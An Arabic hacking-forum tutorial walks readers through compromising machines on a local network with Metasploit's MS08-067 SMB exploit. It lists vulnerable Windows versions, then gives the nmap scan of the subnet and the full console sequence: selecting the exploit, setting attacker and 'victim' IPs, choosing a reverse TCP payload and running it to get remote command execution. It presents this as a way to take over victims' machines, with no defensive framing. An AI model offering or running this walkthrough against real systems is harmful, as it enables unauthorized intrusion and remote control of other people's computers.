بسم الله الرحمن الرحيم
كيفكم شباب
ان شاء الله بخير
مـعكم أخـوكم جيفارا المنصوري
أن شـاء الله ـأرجـع للمـنتدى زي قبـل وأكـثر
اليوم درسنا نخترق شبكتنا المحلية عن الميتا سبلويت
بأستخدام ثغرة smb من المشروع
اول شي نفتح ميتا ************
الثغره المستخدمه هى windows/smb/ms08_067_netapi وهى موجوده فى العديد من اصدرات microsucks
Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
12 Windows XP SP2 Chinese - Simplified (NX)
13 Windows XP SP2 Chinese - Traditional (NX)
14 Windows XP SP2 Czech (NX)
15 Windows XP SP2 Danish (NX)
16 Windows XP SP2 German (NX)
17 Windows XP SP2 Greek (NX)
18 Windows XP SP2 Spanish (NX)
19 Windows XP SP2 Finnish (NX)
20 Windows XP SP2 French (NX)
21 Windows XP SP2 Hebrew (NX)
22 Windows XP SP2 Hungarian (NX)
23 Windows XP SP2 Italian (NX)
24 Windows XP SP2 Japanese (NX)
25 Windows XP SP2 Korean (NX)
26 Windows XP SP2 Dutch (NX)
27 Windows XP SP2 Norwegian (NX)
28 Windows XP SP2 Polish (NX)
29 Windows XP SP2 Portuguese - Brazilian (NX)
30 Windows XP SP2 Portuguese (NX)
31 Windows XP SP2 Russian (NX)
32 Windows XP SP2 Swedish (NX)
33 Windows XP SP2 Turkish (NX)
34 Windows XP SP3 Arabic (NX)
35 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
36 Windows XP SP3 Chinese - Simplified (NX)
37 Windows XP SP3 Chinese - Traditional (NX)
38 Windows XP SP3 Czech (NX)
39 Windows XP SP3 Danish (NX)
40 Windows XP SP3 German (NX)
41 Windows XP SP3 Greek (NX)
42 Windows XP SP3 Spanish (NX)
43 Windows XP SP3 Finnish (NX)
44 Windows XP SP3 French (NX)
45 Windows XP SP3 Hebrew (NX)
46 Windows XP SP3 Hungarian (NX)
47 Windows XP SP3 Italian (NX)
48 Windows XP SP3 Japanese (NX)
49 Windows XP SP3 Korean (NX)
50 Windows XP SP3 Dutch (NX)
51 Windows XP SP3 Norwegian (NX)
52 Windows XP SP3 Polish (NX)
53 Windows XP SP3 Portuguese - Brazilian (NX)
54 Windows XP SP3 Portuguese (NX)
55 Windows XP SP3 Russian (NX)
56 Windows XP SP3 Swedish (NX)
57 Windows XP SP3 Turkish (NX
وهذه الثغره تقوم باستغلال خطأ فى هذا الملف NetAPI32.dll مما يؤدى الى استثمار ناجح لتلك الثغره
نأتى للاستغلال :-
اول حاجه لازم نعمل Fingerprinting على اجهزة الشبكه باستخدام برنامج nmap علشان نعرف الاجهزه ال Vulnerable بالثغره
افتح الدوس واكتب
كود PHP:
nmap -O 192.168.1.0/24
حلو الجهاز المستهدف مصاب
الشبكة تتكون من عدة اجهزة .. اذا الجهاز مو مصاب شوف واحد ثاني
نتابع
نفتح ال ****************sploit console وننفذ التالى
use windows/smb/ms08_067_netapi احنا كده استخدمنا الثغره
set LHOST 192.168.1.2 طبعا انته هتشيل ال ip بتاعى و تحط بتاعك
set RHOST 192.168.1.66 اكيد هتشيل ال ip بتاع ال Victim وتحط اللى انته عاوزه
set PAYLOAD windows/****************l/reverse_tcp دلوقتى احنا اخترنا payload بتعمل reverse connect فى ال Victim machine
حلو وتمام .. الاستغلال تمام
وبعد كده هنفذ الامر exploit
واضغط انتر
هسا احنا حصلنا Reverse connect على جهاز ال Victim وممكن ننفذ الاوامر اللى احنا عاوزنها
ان شاء الله وصلت المعلومة
وان شاء الله بالدروس الجاي نشرح بعض الاومر لتشغيل السيرفر بجهاز الضحية وجلبه على برنامج الاختراق
وان شاءا لله شرح بعض انو ال PAYLOAD ووظائفها
الدرس أنتهى
أخوـكم جيفارا المنصوري
والسلام ـختام
(hojvhr hgaf;i hglpgdi fhgldjh)